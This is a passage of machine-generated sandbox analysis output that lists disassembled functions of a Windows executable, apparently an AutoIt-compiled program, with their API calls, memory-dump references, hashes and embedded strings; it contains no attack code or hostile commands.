                                                                              • __gmtime64_s.LIBCMT ref: 00426ED7
                                                                              • __gmtime64_s.LIBCMT ref: 00426F0D
                                                                              • __gmtime64_s.LIBCMT ref: 00426F2A
                                                                              • __allrem.LIBCMT ref: 00426F80
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426F9C
                                                                              • __allrem.LIBCMT ref: 00426FB3
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426FD1
                                                                              • __allrem.LIBCMT ref: 00426FE8
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00427006
                                                                              • __invoke_watson.LIBCMT ref: 00427077
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                              • String ID:
                                                                              • API String ID: 384356119-0
                                                                              • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                              • Instruction ID: cc18d51bddcb3bff235d9ba930da6ebb912618c2495e950f743dda1aeb2a8d13
                                                                              • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                              • Instruction Fuzzy Hash: F8710876B00726ABD714AF79EC41B5BB3A4AF04328F55412FF514D7281EB78ED048B98
                                                                              Function 00462527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00462542
                                                                              • GetMenuItemInfoW.USER32(004C5890,000000FF,00000000,00000030), ref: 004625A3
                                                                              • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 004625D9
                                                                              • Sleep.KERNEL32(000001F4), ref: 004625EB
                                                                              • GetMenuItemCount.USER32(?), ref: 0046262F
                                                                              • GetMenuItemID.USER32(?,00000000), ref: 0046264B
                                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00462675
                                                                              • GetMenuItemID.USER32(?,?), ref: 004626BA
                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00462700
                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462714
                                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462735
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                              • String ID:
                                                                              • API String ID: 4176008265-0
                                                                              • Opcode ID: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                                                                              • Instruction ID: d041e2a6511ad081bd824cff42eca7b157938f8ca15e77e0b80393dec237999e
                                                                              • Opcode Fuzzy Hash: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                                                                              • Instruction Fuzzy Hash: 3361B470900A49BFDB11CF64CE84DBF7BB8FB01345F14046AE842A7251E7B9AD05DB2A
                                                                              Function 00486F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00486FA5
                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00486FA8
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00486FCC
                                                                              • _memset.LIBCMT ref: 00486FDD
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00486FEF
                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00487067
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$LongWindow_memset
                                                                              • String ID:
                                                                              • API String ID: 830647256-0
                                                                              • Opcode ID: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                                                                              • Instruction ID: 7132dcb9391edd1f4fca7d59f8acd98ed1f58d557d43f29f177e0b8d5bde9df6
                                                                              • Opcode Fuzzy Hash: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                                                                              • Instruction Fuzzy Hash: 17618E75900208AFDB10EFA4CC85EEE77B8EB09700F20056AFA14A73A1C775AD51DB64
                                                                              Function 00456B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00456BBF
                                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00456C18
                                                                              • VariantInit.OLEAUT32(?), ref: 00456C2A
                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00456C4A
                                                                              • VariantCopy.OLEAUT32(?,?), ref: 00456C9D
                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00456CB1
                                                                              • VariantClear.OLEAUT32(?), ref: 00456CC6
                                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00456CD3
                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CDC
                                                                              • VariantClear.OLEAUT32(?), ref: 00456CEE
                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CF9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                              • String ID:
                                                                              • API String ID: 2706829360-0
                                                                              • Opcode ID: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                                                                              • Instruction ID: 21fd5a8c16b11a42553d074c3324144f158a868588d4a73b9a3ed32873cef97c
                                                                              • Opcode Fuzzy Hash: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                                                                              • Instruction Fuzzy Hash: F1418231A001199FCF00DFA9D8449AEBBB9EF18315F01847EE955E7362CB34A949CF94
                                                                              Function 004783BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                              • CoInitialize.OLE32 ref: 00478403
                                                                              • CoUninitialize.OLE32 ref: 0047840E
                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,00492BEC,?), ref: 0047846E
                                                                              • IIDFromString.OLE32(?,?), ref: 004784E1
                                                                              • VariantInit.OLEAUT32(?), ref: 0047857B
                                                                              • VariantClear.OLEAUT32(?), ref: 004785DC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                              • API String ID: 834269672-1287834457
                                                                              • Opcode ID: 88aa62d9e1e5a7c44cda5740427ce94969e3d026dc5a5533a65a85ed07d2a8cb
                                                                              • Instruction ID: cb75df2b24e16c1c2e0b5d8d850f15e0fc33cba1d2aa6ec0deb68a9cf625d14d
                                                                              • Opcode Fuzzy Hash: 88aa62d9e1e5a7c44cda5740427ce94969e3d026dc5a5533a65a85ed07d2a8cb
                                                                              • Instruction Fuzzy Hash: AA61C170648312AFC710DF14C848B9FB7E8AF44744F00881EF9899B291DB78ED48CB9A
                                                                              Function 0046B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0046B4D0
                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0046B546
                                                                              • GetLastError.KERNEL32 ref: 0046B550
                                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 0046B5BD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                              • API String ID: 4194297153-14809454
                                                                              • Opcode ID: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                                                                              • Instruction ID: 3fb85926d1a8df40b98e85eadc692d0a6e2328ff5e483d9ffe01cb822ebdbf3c
                                                                              • Opcode Fuzzy Hash: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                                                                              • Instruction Fuzzy Hash: 29318675A00205AFCB00EB68C845AEE77B4FF45318F10416BF506D7291EB799E86CB9A
                                                                              Function 00458F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00459014
                                                                              • GetDlgCtrlID.USER32 ref: 0045901F
                                                                              • GetParent.USER32 ref: 0045903B
                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 0045903E
                                                                              • GetDlgCtrlID.USER32(?), ref: 00459047
                                                                              • GetParent.USER32(?), ref: 00459063
                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00459066
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 1536045017-1403004172
                                                                              • Opcode ID: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
                                                                              • Instruction ID: 6714b25adca5f569a88cfbaafbe7bd2dd1ba81f724cd7e2599907f028ed7346a
                                                                              • Opcode Fuzzy Hash: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
                                                                              • Instruction Fuzzy Hash: D021D870A00108BFDF04ABA1CC85EFEB774EF45310F10062AF911672E2DB795819DB28
                                                                              Function 0045907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004590FD
                                                                              • GetDlgCtrlID.USER32 ref: 00459108
                                                                              • GetParent.USER32 ref: 00459124
                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00459127
                                                                              • GetDlgCtrlID.USER32(?), ref: 00459130
                                                                              • GetParent.USER32(?), ref: 0045914C
                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 0045914F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 1536045017-1403004172
                                                                              • Opcode ID: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
                                                                              • Instruction ID: 4d8cd3b83cca1d69534b37f7086261ba2dc9307f4c099413b547fbd15d3c7d68
                                                                              • Opcode Fuzzy Hash: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
                                                                              • Instruction Fuzzy Hash: AA21B674A00108BFDF01ABA5CC85EFEBB74EF44301F50452BB911A72A2DB795819DB29
                                                                              Function 00459163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetParent.USER32 ref: 0045916F
                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00459184
                                                                              • _wcscmp.LIBCMT ref: 00459196
                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00459211
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ClassMessageNameParentSend_wcscmp
                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                              • API String ID: 1704125052-3381328864
                                                                              • Opcode ID: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                                                                              • Instruction ID: f102ea4107ca07b1db40aa5d7e68bb0b9a0f71bc8f584d68d6a8224326f4a83e
                                                                              • Opcode Fuzzy Hash: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                                                                              • Instruction Fuzzy Hash: 3111E776248317F9FA112624EC06DAB379CAB15721F30046BFD00E40D2FEA95C56666C
                                                                              Function 004611CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004611F0
                                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00460268,?,00000001), ref: 00461204
                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 0046120B
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 0046121A
                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0046122C
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461245
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461257
                                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 0046129C
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612B1
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612BC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                              • String ID:
                                                                              • API String ID: 2156557900-0
                                                                              • Opcode ID: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                                                                              • Instruction ID: 1e48a1bdefc3aaf7905b324a82868e76ea33fb60fcd143e126220ea2d996acdd
                                                                              • Opcode Fuzzy Hash: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                                                                              • Instruction Fuzzy Hash: 2B31D275600208BFDB109F54EC98F6A37A9EF54315F1582BEFA00E62B0E7789D448B5E
                                                                              Function 00479113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearInit$_memset
                                                                              • String ID: ,,I$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                              • API String ID: 2862541840-2080382077
                                                                              • Opcode ID: 5e45a4bc97ccb967f3a94fe0c7eba0d1116f12234079cc91aabcb7686965c87b
                                                                              • Instruction ID: ae80b45066e4f78fbd037e562a23a34cf658a5e22d7790f01f39a3ab0041c2b1
                                                                              • Opcode Fuzzy Hash: 5e45a4bc97ccb967f3a94fe0c7eba0d1116f12234079cc91aabcb7686965c87b
                                                                              • Instruction Fuzzy Hash: 62919E30A00205ABDF20DFA1C848FEFB7B8EF49714F10855EE909AB281D7789D05CBA4
                                                                              Function 0045A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EnumChildWindows.USER32(?,0045A439), ref: 0045A377
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1453531931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1453511677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453603952.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453671271.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453876342.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453933057.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1453977606.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_1SxKeB4u0c.jbxd
                                                                              Similarity
                                                                              • API ID: ChildEnumWindows
                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                              • API String ID: 3555792229-1603158881
                                                                              • Opcode ID: 1424eacf5de64af2c769219169cfdcdf02d038a0872950fffdd1f519614ed5ca
                                                                              • Instruction ID: 7454df241f77d0b93e78cd2df6a08ba454d4c5e8e9c0a671585cc9aba64ec447
                                                                              • Opcode Fuzzy Hash: 1424eacf5de64af2c769219169cfdcdf02d038a0872950fffdd1f519614ed5ca
                                                                              • Instruction Fuzzy Hash: BA91BB70600505AADB08DF61C452BEEF774BF04305F54822FEC59A7242DB3969ADCB99
                                                                              Function 00402E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetWindowLongW.USER32(?,000000EB), ref: 00402EAE
                                                                                • Part of subcall function 00401DB3: GetClientRect.USER32(?,?), ref: 00401DDC
                                                                                • Part of subcall function 00401DB3: GetWindowRect.USER32(?,?), ref: 00401E1D
                                                                                • Part of subcall function 00401DB3: ScreenToClient.USER32(?,?), ref: 00401E45
                                                                              • GetDC.USER32 ref: 0043CD32
                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0043CD45
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0043CD53
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0043CD68
                                                                              • ReleaseDC.USER32(?,00000000), ref: 0043CD70
